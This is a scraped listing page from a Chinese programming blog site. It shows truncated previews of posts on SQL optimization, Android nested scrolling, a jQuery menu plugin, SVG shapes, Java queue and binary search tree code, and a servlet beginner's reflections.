    转载请出自出处:http://eksliang.iteye.com/blog/2097999   SQL语句的优化总结如下   sql语句的优化可以按照如下六个步骤进行: 合理使用索引 避免或者简化排序 消除对大表的扫描 避免复杂的通配符匹配 调整子查询的性能 EXISTS和IN运算符 下面我就按照上面这六个步骤分别进行总结:
  • 浅析:Android 嵌套滑动机制(NestedScrolling) gg163 android移动开发滑动机制嵌套
    谷歌在发布安卓 Lollipop版本之后,为了更好的用户体验,Google为Android的滑动机制提供了NestedScrolling特性 NestedScrolling的特性可以体现在哪里呢?<!--[if !supportLineBreakNewLine]--><!--[endif]--> 比如你使用了Toolbar,下面一个ScrollView,向上滚
  • 使用hovertree菜单作为后台导航 hvt JavaScriptjquery.nethovertreeasp.net
      hovertree是一个jquery菜单插件,官方网址:http://keleyi.com/jq/hovertree/ ,可以登录该网址体验效果。 0.1.3版本:http://keleyi.com/jq/hovertree/demo/demo.0.1.3.htm hovertree插件包含文件: http://keleyi.com/jq/hovertree/css
  • SVG 教程 (二)矩形 天梯梦 svg
    SVG <rect> SVG Shapes SVG有一些预定义的形状元素,可被开发者使用和操作: 矩形 <rect> 圆形 <circle> 椭圆 <ellipse> 线 <line> 折线 <polyline> 多边形 <polygon> 路径 <path>
  • 一个简单的队列 luyulong java数据结构队列
    public class MyQueue { private long[] arr; private int front; private int end; // 有效数据的大小 private int elements; public MyQueue() { arr = new long[10]; elements = 0; front
  • 基础数据结构和算法九:Binary Search Tree sunwinner Algorithm
      A binary search tree (BST) is a binary tree where each node has a Comparable key (and an associated value) and satisfies the restriction that the key in any node is larger than the keys in all
  • 项目出现的一些问题和体会 Steven-Walker DAOWebservlet
         第一篇博客不知道要写点什么,就先来点近阶段的感悟吧。     这几天学了servlet和数据库等知识,就参照老方的视频写了一个简单的增删改查的,完成了最简单的一些功能,使用了三层架构。 dao层完成的是对数据库具体的功能实现,service层调用了dao层的实现方法,具体对servlet提供支持。  &
  • 高手问答:Java老A带你全面提升Java单兵作战能力! ITeye管理员 java
    本期特邀《Java特种兵》作者:谢宇,CSDN论坛ID: xieyuooo 针对JAVA问题给予大家解答,欢迎网友积极提问,与专家一起讨论! 作者简介: 淘宝网资深Java工程师,CSDN超人气博主,人称“胖哥”。 CSDN博客地址: http://blog.csdn.net/xieyuooo 作者在进入大学前是一个不折不扣的计算机白痴,曾经被人笑话过不懂鼠标是什么,
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他